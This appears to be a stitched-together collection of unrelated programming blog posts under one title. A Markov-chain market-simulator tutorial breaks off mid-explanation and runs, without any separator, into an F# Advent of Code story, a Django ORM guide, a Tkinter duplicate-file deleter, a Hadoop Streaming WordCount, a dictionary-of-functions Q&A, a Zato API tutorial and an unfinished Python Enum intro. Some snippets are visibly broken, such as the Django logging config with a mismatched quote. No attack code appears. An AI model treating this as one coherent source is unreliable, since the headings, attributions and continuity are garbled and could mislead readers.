
How to Build a Market Simulator Using Markov Chains and Python


Model customer behavior, visualize A/B test results, predict user metrics…all using a simple Markovian framework!


[Image: the final product]

In this article, I aim to introduce you (regardless of your technical ability) to Markov chains and use them to simulate customer behavior.

This isn’t going to be a traditional “how to” tutorial with code snippets every two lines. My primary aim in writing this is to provide you with a conceptual framework that you can flexibly use, so you do not necessarily have to code along to learn something new. Technical details will pop up here and there, but I will provide as much intuition for them as possible.

Data Processing

For this analysis I will be using Credit Sesame's analytics data, which I was provided with during a datathon. You can use any user data provided it spans your time-frame of interest (for example, a week's/month's/year's worth of data). It should follow a structure similar to the one below.


[Image: example data]

Examples of actions include "clicked offer/ad", "clicked subscribe", etc. Columns can also hold other metrics such as page views or revenue. Include any column you think will be useful for what you plan on modeling ― in my case, user engagement.

Customer Segmentation

Select a particular day in your dataset and get new-user data for that particular day. I am modeling how new users behave within 30 days of starting to use Credit Sesame's website.


[Image: new-user data on a particular day]

Next, we segment our customers into different categories or states. There are many ways you can do this.

1. Apply a scoring function: Give each user a score indicating their overall engagement. You could use higher weights for actions you think indicate higher engagement, such as session length.

You can then divide the distribution into 3 segments (Inactive, Active and Very Active) based on your heuristics. A sketch of this follows the figure below.


[Image: distribution of the applied score function]
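As a rough illustration, here is a minimal sketch of such a scoring function, assuming a pandas DataFrame df with hypothetical engagement columns; the weights and the quantile-based split are illustrative heuristics, not the article's exact method:

import pandas as pd

# Hypothetical engagement columns; the weights are illustrative heuristics.
weights = {"session_length": 0.5, "click_count": 0.3, "page_views": 0.2}
df["score"] = sum(df[col] * w for col, w in weights.items())

# Split the score distribution into 3 segments:
# 1 = Inactive, 2 = Active, 3 = Very Active.
df["segment"] = pd.qcut(df["score"], q=3, labels=[1, 2, 3])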

2. Apply an unsupervised algorithm such as k-means: You can use clustering algorithms such as k-means to group similarly engaged customers. Each cluster will have its own distinct properties, hopefully the ones you wish to model. You could even apply the algorithm to your previously calculated score (univariate data) to make it even simpler; a sketch follows the figures below.


[Image: k-means segments visualized on the score function]
[Image: after segmentation on first-day data; 1 = inactive user, 2 = active user, 3 = very active user]
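A minimal sketch of the univariate variant, assuming scikit-learn and the df["score"] column from the sketch above:

from sklearn.cluster import KMeans

# Cluster users into 3 segments using only the engagement score (univariate).
kmeans = KMeans(n_clusters=3, random_state=0)
df["segment"] = kmeans.fit_predict(df[["score"]])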

After segmenting the first-day data, pick a time-frame. I chose a month, as I believe Credit Sesame has a lot of returning users and the magnitude of that can be captured with a month's worth of data. After 30 days, users will have had the opportunity to shift to and from each segment: very active users may become inactive, moderately active users may become very active, and so on.

Apply segmentation to this post-30-day data. Make sure you account for the time frame (for example, average your engagement score for the 30 days).


[Image: segmentation applied to the 30-day data]

Let’s visualize the results:



As expected, the number of users who became inactive rose over the 30 days and the number of users who stayed active and very active decreased.

Onto applying the Markov framework

Markov Chains Groundwork

Markov chains are simply mathematical systems that model state-to-state movement using certain probabilistic rules and fixed assumptions.

To put it more simply, when you have a system with fixed states (or segments), and agents/users who can move between those states with a certain fixed probability, you can model it using a Markov chain.

But let us first see if our system satisfies the assumptions of a Markov model:

ASSUMPTION 1: There is a finite set of states. In our system there are only 3 segments customers can move in and out of.

ASSUMPTION 2: The probabilities of moving between states are fixed. I admit this is a strong assumption. While my system does take into account hundreds of thousands of user data points, it is easy to believe that the variance of the probabilities across different 30-day time frames shouldn't be too large. But even with a lot of data, as we will see later in the article, we have to be cautious.

ASSUMPTION 3: State accessibility. Users in any segment can move to a different segment without any external restriction.

ASSUMPTION 4: Non-cyclic. The segment-to-segment movement is in no way "automatic" in our system, so this assumption is satisfied.

Our system performs well against most assumptions of the Markov chain. This gives us some confidence in our model estimates, which we will get to once we build the model.

Constructing the Markov Chain

There are three parts to a Markov chain that are best represented as matrix-vector multiplication. If you are completely new to linear algebra, I would recommend going through this link before proceeding with the article.


[Image: N represents the number of segments]

The initial state in our system is a 3x1 vector that represents the number of users in each segment. The end state is also a 3x1 vector that shows the number of users in each segment after the first month (after we multiply the initial state vector with the probabilities matrix). The transition probability matrix is a 3x3 matrix that represents the fixed probabilities of moving to and from different customer segments.
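A minimal numerical sketch of that multiplication, with made-up numbers (note that each column of P sums to 1):

import numpy as np

# Initial state: users in segments 1..3 on day 1 (illustrative numbers only).
initial = np.array([5000, 3000, 1000])

# Transition matrix: column j holds the probabilities of moving out of segment j.
P = np.array([
    [0.89, 0.50, 0.30],
    [0.08, 0.35, 0.30],
    [0.03, 0.15, 0.40],
])

end = P @ initial  # users in each segment after 30 days
print(end)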

So how do we calculate these fixed probabilities?



We calculate them from our recorded segment movements: we look at how users from each segment on day 1 moved among the segments after 30 days, and compute the probabilities accordingly (they are simply the observed proportions).

The 0.89 in the picture is the probability that someone who is in segment 1 on day 1 is still in segment 1 after 30 days, i.e. the probability that an inactive user stays inactive. Note that the probabilities in each column must add up to 1. We repeat this process for all segments and build the final transition matrix:


[Image: deconstructing the transition matrix]
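In code, estimating these proportions can be a single cross-tabulation. A sketch assuming a pandas DataFrame df with one row per user and hypothetical segment_day1 / segment_day30 columns:

import pandas as pd

# Count movements between segments, then normalize each column to sum to 1.
counts = pd.crosstab(df["segment_day30"], df["segment_day1"])
transition_matrix = counts / counts.sum(axis=0)
print(transition_matrix)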

A Tale of Two Functions

In Which Ben Learns 1 Is The Loneliest Number

So, my biggest shortcoming as a developer is the toolkit of algorithms I have at my fingertips by instinct. It's not that I'm not pretty familiar with the basics, at least, but I still haven't put in the time necessary to immediately look at a problem and say "oh, this is just that other problem". At least not at 7 in the morning, warming up from the frigid trudge up the hill well before my shift. Advent of Code makes fools of us all.

This is the story of how I instinctively reached for the dumb thing even knowing it was dumb instead of taking a second and thinking about it and wasted precious, precious leaderboard points because of it. The humanity.

This is a beginner-level post, even if you aren't terribly comfy with F#/ML.

The Exposition

Day 5 has us comparing successive characters. If they're a pair of one lowercase and one uppercase of the same letter, both are dropped from the set; otherwise the process continues. We're done when we're out of pairs.

We'll start with the wrong way. Because this is my 5th problem ever in F# and it's been some time since I've used an ML, I wanted to do it recursively! Hooray! I just forgot that doesn't always mean the same thing.

I also am on a swap week - I'm used to a cushy 90 minutes before I switch off and do numbers all morning until lunch, but this week I only had 60! The clock was ticking on this one but I was amped from Day 4 where my first go did the trick, more or less, and went in cocky. Luckily, I know all about how to solve stuff recursively, I have a few days of ironing out the unfamiliar edges of the languages behind me, and this problem looks like a piece of cake. I'm not going for style on the first time through, I'm going for that sweet, sweet answer.

What I missed at this crucial juncture is (as so many others noted rather quickly) that this only takes a single pass to do. As soon as you swap a pair you should check right then and there if you need to swap again, and keep doing that until you're through - that's all it takes! Voila, processed. It's not unlike the Matching Parenthesis problem - clearly the intended solution. The example given in the problem description even does that operation right there in front of you, by the way. You can't miss it.

I made no such magical leap, though. I missed it. In my first instinct I just saw an operation that needed doing and tried-and-true way to ensure it got done.

I knew I'd want to compare two elements at once as we go through to check if they react, and I'd need a way to tell it to run through again if we made changes to see if any new pairs popped up. After all, this general pattern worked for me on Day 1, part 2:

let rec addFreqWithState acc visited whole remaining =
    match remaining with
    | [] -> addFreqWithState acc visited whole whole
    | head::tail ->
        let newval = acc + head
        if Set.contains newval visited then newval
        else addFreqWithState newval (Set.add newval visited) whole tail

Now, if you're shaking your head by this point, good. You should be. Heck, I was. I looked at the input string - it's huge. This thing is about to do a ton of work, I just knew it before writing any code, but I didn't think it could possibly take that long and I'd just come back later and find a better solution after I got my little happy star - winter, amirite?

I'll just store what I need as parameter to the recursive function - a boolean for whether or not we're done and the original string to start over with. In fact, I'll just drain one into the other and flop them! How simple, how nice. Almost warm and cozy, like a nice cup of ML should be.

The First Go

I'll start by building the base case:

let rec reactString altered result input =
    match input with
    | [] ->
        if altered then reactString false "" (string result |> List.ofSeq)
        else result

If it made any changes on this run, then recur again, resetting everything and using the new result to create our input list of chars. If it didn't (so, you know, it just ran all the way through again doing zero work to ascertain this), it can finally give us back the damn result string.

Okay. One case in and it already hurts, but time is money. Let's write the other part and get on with it.

let rec reactString altered result input =
    match input with
    | [] ->
        if altered then reactString false "" (string result |> List.ofSeq)
        else result
    | head::next::tail ->
        if doesReact head next then reactString true result tail
        else reactString altered (result + string head) ([next] @ tail)

I get at the first two by destructuring the input list and calling them head and next. I check if they react:

let doesReact first second =
    (System.Char.ToUpper first = System.Char.ToUpper second) && first <> second

One of the first gotchas right out of the gate with F# is the equality operators - instead of == and != you're working with = and <>.

If they do react, then we make sure we note that in the boolean we're passing along and recur with tail - everything after the two we just checked.

We did totally move on from any new pair we created in the result, but it's cool, yo. We'll catch 'em on the next go-round! (oof).

If they didn't react, we're recurring through input again but "draining" it into result - add the head and keep next up with the input list for the next iteration.

At this point the compiler helpfully reminds me there are lists with one element, and I have to deal with that reality. Thanks, compile-time enforced correctness! I don't really want to think about it, so we'll "base case" that too - here's our final iteration:

let rec reactString altered result input =
    match input with
    | [] ->
        if altered then reactString false "" (string result |> List.ofSeq)
        else result
    | [a] ->
        if altered then reactString false "" (string result + string a |> List.ofSeq)
        else result + string a
    | head::next::tail ->
        if doesReact head next then reactString true result tail
        else reactString altered (result + string head) ([next] @ tail)

It's almost the same as for [] - it definitely won't react so we don't check - but we pass it along, either back into the input list if needed or added to our accumulated result string.

It ain't pretty, but it'll do.

And do it did - pretty much on the first try, which has been my favorite thing about F#. Not the first try exactly, but the first successful compile usually does what I meant. Getting the actual problem answers just involves running this once, and then running it a bunch of times on different permutations of the input, removing specific letters each time and trying again, so this is where any real work is happening. It did what I asked of it, and my answers were correct.

I literally aged while it did it, though. I started unlocking cabinets, I went to the bathroom, I chatted with Mike down the hall, another early-bird. Didn't finish. I went and grabbed the mail, filtered my emails - nothing.

I left my laptop open on my desk. It's an old laptop - late 2011 Thinkpad. It's doing its best. Curses!

It finishes, just twelve minutes until work begins. I had misread the problem - it didn't want the letter that was most optimal, it wanted the resulting length of that string. The result of that massive computation, that measly 'j', was staring at me, taunting me. I had to run it again. Minutes were ticking by and I still didn't have what I needed - even though I did have "the right answer".

Luckily, I made the code change in under two minutes. And started it again.

Endless minutes go by. 8 AM comes. I start work, glancing every few minutes as I get my day organized. The phone starts ringing and the emails start coming as my colleagues roll in and I don't get to check back until maybe an excruciating hour later and there it is, smug as ever - the right friggin' answer. Ouch.

The Realization

It took not two seconds. I opened the thread, got to the top post from @aspittel, and got two lines into the function:

def react(text):
    stack = []

Ohhhhh. Oh right. Make a stack. It was all crystal clear in a moment. But alas - the time had come. I had a bunch of contract adjustments to do before I could dive back in.

The Fix

Fast-forward to lunch, and I simply translate hers:


Ali Spittel, Dec 5:

A dumb order-of-operations mistake got me to this point - I was missing the parens around the last half of the conditional since like 12:20. This mirrors the classic stack match-parentheses problem.

My solution is kinda pretty though:

with open('input.txt', 'r') as f:
    text = ''
    for line in f:
        text += line.strip()

def react(text):
    stack = []
    for letter in text:
        last = stack[-1] if stack else None
        if letter != last and (last == letter.upper() or last == letter.lower()):
            stack.pop()
        else:
            stack.append(letter)
    return len(stack)

# A1
print(react(text))

# A2
possibilities = set(text.lower())
print(min(react(text.replace(p, '').replace(p.upper(), '')) for p in possibilities))

Mine looks almost identical, just ML-style. Instead of a for loop, I'm folding into an Array . It doesn't take long - maybe 5 minutes to get it to compile:

let reactQuickly input =
    Seq.fold (fun s c ->
        let last = if Array.length s > 0 then Some (Array.last s) else None
        match last with
        | Some x ->
            if c <> x && (x = System.Char.ToUpper c || x = System.Char.ToLower c)
            then Array.sub s 0 (Array.length s - 1)
            else Array.append s [| c |]
        | None -> Array.append s [| c |]) [| |] input
    |> Array.length

While I generally like ML-type syntax, even above most other languages I've tried, I've gotta say her Python version looks very nice and clean in comparison. They do the same thing.

On each iteration, s is our result array - the stack in her implementation. I use c for the character from the input we're looking at - sometimes I just prefer el here to convey the element of the list we're folding over.

To get at two at a time, instead of looking forward we look back into the stack. We've got access to it right there in the function. If it's empty we store a None so we know to just push whatever the string starts with on the first iteration and otherwise we check the current character against the top of the stack.

Instead of stack.pop we just return a subset of our accumulator, which has the same effect. That's it though.

To check if it worked, all I did was replace the word reactString with reactQuickly . Same answers in three seconds on that old laptop, under one second on my desktop at home.

It turns out one pass is fewer passes than lots and lots of passes. Go figure.

See here for the complete file.

Optimize the Django ORM


Recently, I have been optimizing some functions that were slower than expected. As with most MVPs, the initial iteration was to get something working and out there. Looking at Scout APM revealed that some of the database queries were slow, including several n+1 queries. The n+1 queries happened because I was looping over a set of models and either updated or selected the same thing for each model. My goal was to reduce duplicate queries and squeeze out as much performance as I could by refactoring the naive, straightforward operations into more performant equivalents.

In all honesty, the code is slightly more complicated to read through now, but I cut the time for my use-case in half without changing anything else about the server or database.

Use the ORM, Luke

One of Django's main benefits is the built-in models and object-relational mapper (ORM). It provides a quick to use, common interface for data operations for your models and can handle most queries pretty easily. It can also do some tricky SQL once you understand the syntax.

It's easy to get building quickly. It’s also easy to end up making more (costly) SQL calls than you realize.

Hasta la vista, models

Here are some sample models that will be used to illustrate some of the concepts below.

# models.py
class Author(models.Model):
    name = models.CharField(max_length=50)

class Book(models.Model):
    author = models.ForeignKey(Author, related_name="books", on_delete=models.PROTECT)
    title = models.CharField(max_length=255)

Show me the SQL (part 1)

Because the SQL calls are abstracted behind a simple API, it's easy to end up making more SQL calls than you realize. You can retrieve a close approximation with the query attribute on a QuerySet, but heed the warning about it being an "opaque representation".

books = Book.objects.all()
print("books.query", books.query)

Show me the SQL (part 2)

You can also add django.db.backends to your configured loggers to see the generated SQL printed out to the console.

"loggers": { "django.db.backends": { "level": "DEBUG", "handlers': ["console", ], } } Show me the sql (part 3)

You can also print out the time and generated SQL that Django stores on the database connection.

from django.db import connection

books = Book.objects.all()
list(books)  # evaluate the queryset so a query is actually executed

print("connection.queries", connection.queries)

The one Toolbar to rule them all

If your code is called from a view, the easiest way to start deciphering what SQL is generated is to install Django Debug Toolbar. DDT provides an unbelievably helpful diagnostic panel which shows all of the SQL queries being run, how many are similar to each other, and how many are duplicated. You can also look at the query plan for each SQL query and dig into why it might be slow.

Select and prefetch all the relateds

One thing to realize is that Django's ORM is pretty lazy by default. It will not run queries until the result has been asked for (either in code or directly in a view). It also won't join models by their ForeignKeys until needed. Those are beneficial optimizations; however, they can bite you if you don't realize they are happening.

# views.py
def index(request):
    books = Book.objects.all()
    return render(request, "index.html", {"books": books})

<!-- index.html -->
{% for book in books %}
  Book Author: {{ book.author.name }}<br />
{% endfor %}

In the code above, each book in the for loop in index.html will call the database again for the author's name. So, there would be 1 database call for all of the books, and then an additional database call to get each author's name.

The way to prevent the extra database calls is to use select_related to force Django to join to the other model once and prevent subsequent calls if that relation is used.

Updating the view code to use select_related reduces the total SQL calls to only 1 for the same Django template.

# views.py
def index(request):
    books = Book.objects.select_related("author").all()
    return render(request, "index.html", {"books": books})

In some cases select_related won't work, but prefetch_related will. The Django documentation has lots more details about when to use prefetch_related .

Beware the instantiating of models

When the Django ORM creates a QuerySet it takes the data retrieved from the database and populates the models. However, if you don't need a model, there are a few ways to skip constructing them unnecessarily.

values_list will return a list of tuples for all of the columns specified. Particularly useful is the flat=True keyword argument which returns a regular list if only one field is specified.

# get a list of book ids to use later
book_ids = Book.objects.all().values_list("id", flat=True)

Another pattern that I have done in the past is to create a dictionary with pair of data that is required. For example, if I was going to need blog ids and their urls:

# get a dictionary of book id->title
book_ids_to_titles = {
    b.get("id"): b.get("title")
    for b in Book.objects.all().values("id", "title")
}

To get all of the book ids: book_ids_to_titles.keys(). To get all of the titles: book_ids_to_titles.values().

Somewhat related, bidict is an easy-to-use library for when you need to retrieve a dictionary's key from its value and vice versa (as opposed to keeping around 2 dictionaries).

Filtering on ids makes the world go 'round

Using filter translates to a WHERE clause in SQL, and searching for an integer will almost always be faster than searching on a string in Postgres. So, Book.objects.filter(id__in=book_ids) will be slightly more performant than Book.objects.filter(title__in=book_titles) .

Only and defer to your heart's content

only and defer are mirror-opposite methods for achieving the same goal of retrieving only particular fields for your model. only works by SELECTing the specified database fields, but not filling in any non-specified fields. defer works the opposite way: the listed fields are excluded from the SELECT statement.
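A quick sketch of both with the models above (only and defer are standard QuerySet methods):

# Fetch just `id` and `title`; accessing any other field later
# triggers an extra query per instance.
books = Book.objects.only("id", "title")

# The mirror image: fetch everything except `title`.
books = Book.objects.defer("title")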

However, this note in the Django documentation is telling:

They provide an optimization for when you have analyzed your queries closely and understand exactly what information you need and have measured that the difference between returning the fields you need and the full set of fields for the model will be significant.

Annotate and carry on

For some code, I was getting a count for each model in a list in a loop.

for author in Author.objects.all():
    book_count = author.books.count()
    print(f"{book_count} books by {author.name}")

This will create one SQL SELECT statement for every author. Instead, using an annotation will create one SQL query.

from django.db.models import Count

author_counts = (
    Author.objects
    .annotate(book_count=Count("books"))
    .values("name", "book_count")
)

for obj in author_counts:
    print(f"{obj.get('book_count')} books by {obj.get('name')}")

Aggregation is the simpler version of annotation, for when you want to calculate a value over all objects in a list (e.g. get the maximum id from a list of models). Annotation is useful when you want to calculate values over each model in a list and get the output per model.
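For example, a minimal aggregation over the models above:

from django.db.models import Count, Max

# One query that collapses the whole queryset into a single dict.
stats = Author.objects.aggregate(author_count=Count("id"), max_id=Max("id"))
print(stats)  # e.g. {'author_count': 42, 'max_id': 42}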

Bulk smash! Errr, create

Creating multiple objects with one query is possible with bulk_create . There are some caveats to using bulk_create , and unfortunately you don't get a list of ids created after the insert which would be useful. But, for simple use-cases it works great.

author = Author(name="Neil Gaiman")
author.save()

Book.objects.bulk_create([
    Book(title="Neverwhere", author=author),
    Book(title="The Graveyard Book", author=author),
    Book(title="The Ocean at the End of the Lane", author=author),
])

We want to bulk you up

update is a method on QuerySet, so you are able to retrieve a set of objects and update a field on all of them with one SQL query. However, if you want to update a set of models with different field values, django-bulk-update will come in handy. This package lets you create one SQL statement for a set of model updates even if they have differing values.

from django.utils import timezone
from django_bulk_update.helper import bulk_update

books = Book.objects.all()
for book in books:
    book.title = f"{book.title} - {timezone.now()}"

# generates 1 sql query to update all books
bulk_update(books, update_fields=['title'])

Gonna make you sweat (everybody Raw SQL now)

If you really can't figure out a way to get the Django ORM to generate performant SQL, raw SQL is always available, although it's generally not advised unless you have to use it.

Putting on the ritz

The Django documentation is generally really helpful and will give you more in-depth details about each technique above. If you know of any other approaches to squeezing the most performance out of Django, I would love to hear about them on @adamghill .

Originally published on adamghill.com .

codingdirectional: Delete duplicate file with python program


In this article we start to explore the technique we will use to delete a duplicate file from a folder on our computer. The main objective in this chapter is to select a file in one folder, then search another folder and delete any file with the same filename as the one we selected earlier. We will reuse the program we created in the previous chapter to delete the duplicate file on the hard drive.

First of all, there are not many changes in the main file; I just added another if statement to make sure that a new remove-thread instance only gets created once the folder we want to search for the duplicate file has been selected.

from tkinter import *
from tkinter import filedialog
from Remove import Remove
import os

win = Tk() # 1 Create instance
win.title("Multitas") # 2 Add a title
win.resizable(0, 0) # 3 Disable resizing the GUI
win.configure(background='black') # 4 change background color

# 5 Create a label
aLabel = Label(win, text="Remove duplicate", anchor="center")
aLabel.grid(column=0, row=1)
aLabel.configure(foreground="white")
aLabel.configure(background="black")

# 6 Create a selectFile function to be used by button
def selectFile():
    filename = filedialog.askopenfilename(initialdir="/", title="Select file")
    if(filename != ''):
        filename = filename.split('/')[-1] # this is for the windows separator only
        folder = filedialog.askdirectory() # 7 open a folder then create and start a new remove thread to delete the duplicate file
        if(folder != ''):
            remove = Remove(folder, aLabel, filename)
            remove.start()

# 8 Adding a Button
action = Button(win, text="Open Folder", command=selectFile)
action.grid(column=0, row=0) # 9 Position the button
action.configure(background='brown')
action.configure(foreground='white')

win.mainloop() # 10 start GUI

Next, the thread class that deletes the duplicate file if it finds one in the chosen folder.

import threading
import os

class Remove(threading.Thread):
    def __init__(self, massage, aLabel, filename):
        threading.Thread.__init__(self)
        self.massage = massage
        self.label = aLabel
        self.filename = filename

    def run(self):
        text_filename = 'There is no duplicate item'
        filepaths = os.listdir(self.massage)
        for filepath in list(filepaths):
            if(filepath == self.filename):
                os.chdir(self.massage)
                os.remove(filepath)
                text_filename = filepath + ' has been removed'
        self.label.config(text=text_filename)
        return

This is just the beginning of this project; in the next chapter we will search within sub-folders to further look for files with the same name. But we will not stop there, because what we really want to achieve is to delete files with the same content instead of the same name, since a file with the same name might contain different content, which means it is not a duplicate file after all. For now, let's pretend it is; the most important strategy when writing a program is to build up the framework first.
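As a small preview of that content-based comparison, here is a minimal sketch (not part of this chapter's program) that fingerprints a file's content with hashlib; two files are duplicates if their digests match:

import hashlib

def file_hash(path, chunk_size=65536):
    # Hash the file in chunks so large files don't need to fit in memory.
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(chunk_size), b''):
            h.update(chunk)
    return h.hexdigest()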

Writing a MapReduce WordCount in Python

Preface

Although Hadoop is a framework written in Java, that does not mean it can only be used from Java. Since version 0.14.1, Hadoop has supported Python and C++, and the Hadoop documentation also says you can develop in Python. Normally you would consider packaging the source into a jar and running that (example: PythonWordCount), which is clearly inconvenient. The Hadoop documentation mentions Hadoop Streaming, which lets us drive Hadoop with streams instead.

Its syntax is:

hadoop jar hadoop-streaming-2.9.2.jar \
    -input myInputDirs \
    -output myOutputDir \
    -mapper /bin/cat \
    -reducer /usr/bin/wc

Just specify the input and output locations plus the mapper and reducer.

Python's sys module provides stdin and stdout, the input and output streams, which we can use to write MapReduce jobs. This article uses WordCount as the example.

Coding

In the project directory we create two files, mapper.py and reducer.py, and give them execute permission with chmod +x mapper.py (and likewise for reducer.py).

Mapper

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
-------------------------------
FileName: mapper
Author: ying
Date: 18-12-6
-------------------------------
Change Activity: 18-12-6
"""
import sys

__author__ = "YingJoy"

for line in sys.stdin:  # capture the input stream
    line = line.strip()
    words = line.split()
    for word in words:
        # note: emit each word with a count of 1
        print("%s\t%s" % (word, 1))

Reducer

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
-------------------------------
FileName: reducer
Author: ying
Date: 18-12-6
-------------------------------
Change Activity: 18-12-6
"""
import sys

__author__ = "YingJoy"

word_dict = {}

for line in sys.stdin:
    line = line.strip()
    word, count = line.split('\t')
    try:
        count = int(count)
    except ValueError:
        continue
    if word in word_dict:
        word_dict[word] += count
    else:
        word_dict[word] = count

for k, v in word_dict.items():
    print('%s\t%s' % (k, v))

Testing the code

Here we use Linux pipes for testing, feeding the output of each stage into the next:

echo "foo foo quux labs foo bar quux" | ./mapper.py
foo     1
foo     1
quux    1
labs    1
foo     1
bar     1
quux    1

echo "foo foo quux labs foo bar quux" | ./mapper.py | sort -k1,1 | ./reducer.py
bar     1
foo     3
labs    1
quux    2

Running the code on Hadoop

Preparation

First, download a few e-books from http://www.gutenberg.org/ (choose Plain Text UTF-8).

Then upload the text files to HDFS:

# create the folder first, otherwise an error occurs
hdfs dfs -mkdir gutenberg
hdfs dfs -put *.txt gutenberg
hdfs dfs -ls gutenberg

Note that relative paths in HDFS are relative to the current user's home directory; for the user ying the default location is /user/ying.

You can now see the freshly uploaded files in HDFS.

Launching the MapReduce job

Run the following command:

hadoop jar /opt/hadoop-2.9.2/share/hadoop/tools/lib/hadoop-streaming-2.9.2.jar \
    -file ./mapper.py -mapper ./mapper.py \
    -file ./reducer.py -reducer ./reducer.py \
    -input /user/ying/gutenberg/* -output /user/ying/output

Note: use the hadoop command here. If you use the hdfs command you will get an error: main class not found.

While it runs you can watch your job at localhost:8088.

Wait for the job to finish, then look at the results in the output directory. Note that the output directory must not exist before the run, otherwise the job errors out.

Access functions via Dictionary


I have a function like this:

def abc(a, b):
    return a + b

And I want to assign it to a dictionary like this:

functions = {'abc': abc(a,b)}

The trouble is, when assigning it to the dictionary, since the arguments are not yet defined, I get the error:

NameError: name 'a' is not defined

I would do the obvious thing and define the arguments ahead of time, but I need to define them in a loop (and then call the function based on locating it in a list), like this:

functions_to_call = ['abc']
for f in functions_to_call:
    a = 3
    b = 4
    # This is supposed to locate and run the function from the dictionary if it is in the list of functions.
    if f in functions:
        functions[f]

I need to define them in a loop (and then call the function based on locating it in a list)

Then what's the issue with simply saving the function object in the dictionary:

functions = {'abc':abc}

and then applying a and b to the function while looping:

functions_to_call = ['abc']
for f in functions_to_call:
    a, b = 3, 4
    if f in functions:
        functions[f](a, b)

Zato Blog: Introducing Zato public API services


This article offers a high-level overview of the public services that Zato offers to users wishing to manage their environments in an API-driven manner in addition to web-admin and enmasse tools.

Overview

Most users start to interact with Zato via its web-based admin console. This works very well and is a great way to get started with the platform.

In terms of automation, the next natural step is to employ enmasse which lets one move data across environments using YAML import/export files.

The third way is to use the API services - anything that can be done in web-admin or enmasse is also available via dedicated API services. Indeed, both web-admin and enmasse are clients of the same services that users can put to work in their own integration needs.

The public API is built around a REST endpoint that accepts and produces JSON. Moreover, a purpose-built python client can access all the services whereas an OpenAPI-based specification lets one generate clients in any language or framework that supports this popular format.

Python usage examples follow in the blog post but the full documentation has more information about REST and OpenAPI too.

Prerequisites

The first thing needed is to set a password for the API client that will be used; it is an HTTP Basic Auth definition whose username is pubapi. Remember, however, that there are never any default secrets in Zato, so the automatically generated password cannot be used as-is. To change the password, navigate in web-admin to Security -> HTTP Basic Auth and click Change password for the pubapi user.



Now, we can install the Python client package from PyPI. It does not matter how it is installed, it can be done under a virtual environment or not, but for simplicity, let's install it system-wide:

$ sudo pip install zato-client

This is it as far as prerequisites go; everything is ready to invoke the public services now.

Invoking API services

For illustration purposes, let's say we would like to be able to list and create ElasticSearch connections.

The easiest way to learn how to achieve it is to let web-admin do it first - each time a page in web-admin is accessed or an action like creating a new connection is performed, one or more entries are stored in admin.log files on the server that handles the call. That is, admin.log is the file that lists all the public API services invoked along with their input/output.

For instance, when you list ElasticSearch connections, here is what is saved in admin.log:

INFO - name:`zato.search.es.get-list`, request:`{'cluster_id': 1}`
INFO - name:`zato.search.es.get-list`, response:`'{"zato_search_es_get_list_response": [], "_meta": {"next_page": null, "num_pages": 0, "prev_page": null, "has_prev_page": false, "cur_page": 1, "page_size": 50, "has_next_page": false, "total": 0}}'`

It is easy to discern that:

The service invoked was zato.search.es.get-list
Its sole input was the cluster ID to return connections for
There were no connections returned on output, which makes sense because we have not created any yet

Let's do the same in Python now:

# Where to find the client
from zato.client import APIClient

# Credentials
username = 'pubapi'
password = '<secret>'

# Address to invoke
address = 'http://localhost:11223'

# Build the client
client = APIClient(address, username, password)

# Choose the service to invoke and its request
service_name = 'zato.search.es.get-list'
request = {'cluster_id': 1}

# Invoke the API service
response = client.invoke(service_name, request)

# And display the response
print(response.data)

Just like expected, the list of connections is empty:

$ python pubapi.py
[]
$

Navigate to web-admin and create a new connection via Connections -> Search -> ElasticSearch, as below:



Let's re-run the Python example now to witness that the newly created connection can in fact be obtained from the service:

$ python pubapi.py
[{
  u'name': u'My Connection',
  u'is_active': True,
  u'hosts': u'127.0.0.1:9200\r\n',
  u'opaque1': u'{}',
  u'timeout': 5,
  u'body_as': u'POST',
  u'id': 1
}]
$

But this is not over yet - we still need to create a new connection ourselves through an API service. If you kept admin.log open while the connection was being created in web-admin, you noticed that the service used was zato.search.es.create and that its input was saved to admin.log too, so we can modify our Python code accordingly:

# Where to find the client
from zato.client import APIClient

# Credentials
username = 'pubapi'
password = '<secret>'

# Address to invoke
address = 'http://localhost:11223'

# Build the client
client = APIClient(address, username, password)

# First, create a new connection
service_name = 'zato.search.es.create'
request = {
    'cluster_id': 1,
    'name': 'API-created connection',
    'hosts': '127.0.0.1:9201',
    'timeout': 10,
    'body_as': 'POST'
}
client.invoke(service_name, request)

# Now, get the list of connections, it should include the newly created one
service_name = 'zato.search.es.get-list'
request = {'cluster_id': 1}
response = client.invoke(service_name, request)

# And display the response
print(response.data)

This is a success again because on output we now have both the connection created in web-admin as well as the one created from the API client:

$ python pubapi.py
[{
  u'name': u'API-created connection',
  u'is_active': True,
  u'hosts': u'127.0.0.1:9201',
  u'opaque1': u'{}',
  u'timeout': 10,
  u'body_as': u'POST',
  u'id': 2
}, {
  u'name': u'My Connection',
  u'is_active': True,
  u'hosts': u'127.0.0.1:9200\r\n',
  u'opaque1': u'{}',
  u'timeout': 5,
  u'body_as': u'POST',
  u'id': 1
}]
$

Just to double-check it, we can also list the connections in web-admin and confirm that both are returned:


Summary

That is really it. The process is as straightforward as it gets: create a client object, choose a service to invoke, give it a dict request, and a Python object is returned on output.

Note that this post covered Python only but everything applies to REST and OpenAPI-based clients too - the possibilities to interact with the public API are virtually limitless and may include deployment automation, tools to test installation procedures or custom command and control centers and administration dashboards.

Python's Enum Type

Getting started

Python's native types do not include an enumeration type. To provide a better solution, Python added the enum standard library in version 3.4 via PEP 435.

An enumeration type can be seen as a set of labels or a collection of constants, typically used to represent a specific finite set such as weekdays, months, or states. Before a dedicated enum type existed, we usually simulated one with a dict or a class:

Color = {
    'RED': 1,
    'GREEN': 2,
    'BLUE': 3,
}

class Color:
    RED = 1
    GREEN = 2
    BLUE = 3

Implementing enums this way works if used very carefully, but it is a compromise: the hidden danger is that the values can be modified.

Using Enum

The better way is to use the standard library's Enum type; the official library deserves your trust. Versions before 3.4 can install the backport with pip install enum34. A simple example:

from enum import Enum

class Color(Enum):
    red = 1
    green = 2
    blue = 3

Enum members have values (duplicates are allowed by default), and members have a friendly string representation:

>>> print(Color.red)
Color.red
>>> print(repr(Color.red))
<Color.red: 1>
>>> type(Color.red)
<enum 'Color'>
>>> isinstance(Color.green, Color)
True

Enum types cannot be instantiated and cannot be modified.
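For example, trying to reassign a member raises an error:

>>> Color.red = 4
AttributeError: Cannot reassign members.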

Defining enums

When defining an enum, member names must not repeat:

class Color(Enum):
    red = 1
    green = 2
    red = 3  # TypeError: Attempted to reuse key: 'red'

Member values may repeat; a later member with the same value is treated as an alias of the first:

class Color(Enum):
    red = 1
    green = 2
    blue = 1

